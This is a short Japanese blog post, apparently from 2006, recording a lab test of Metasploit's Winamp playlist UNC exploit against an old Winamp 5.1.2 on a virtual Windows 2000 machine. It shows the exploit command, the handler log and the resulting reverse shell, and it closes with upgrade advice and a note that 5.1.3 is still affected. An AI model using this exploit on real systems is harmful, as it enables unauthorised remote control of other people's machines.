winamp_playlist_uncを試してみた
- winamp_playlist_uncを試してみました
(実行環境)
WindowsXP SP2 + Metasploit Framework 2.5
(PC)
Windows 2000 server SP4(vmware) + winamp 5.1.2
- exploitsを実行すると、httpサーバとなります
msf winamp_playlist_unc(win32_reverse_stg) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.1.1:8080/
- あとは、PC側からセッションが張られてきて・・ ガクガク(((( ;゚Д゚))))ブルブル
[*] HTTP Client connected from 192.168.1.100:1326, sending 296 bytes of payload.
..
[*] Got connection from 192.168.1.1:4321 <-> 192.168.1.100:1328
[*] Sending Stage (143 bytes)Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.C:\Program Files\Winamp>netstat -an | find "192.168.1.1"
netstat -an | find "192.168.1.1"
TCP 192.168.1.100:1316 192.168.1.1:139 ESTABLISHED
TCP 192.168.1.100:1328 192.168.1.1:4321 ESTABLISHEDC:\Program Files\Winamp>
- リバースシェル以外にも任意のコマンドが実行できたりします
- ってことで、バージョンアップしましょう ヽ(´ー`)ノ
- ついでに脆弱性のあるWinampをインストールしている状態で怪しげなサイトへはアクセスしないようにしましょうw
●2006/02/06 追記
- grinさんのところで、プレイリスト形式での検証結果があります
●2006/02/16 追記
- 5.1.3でもまだ問題あり・・
- 少しの変更でいけるみたい
><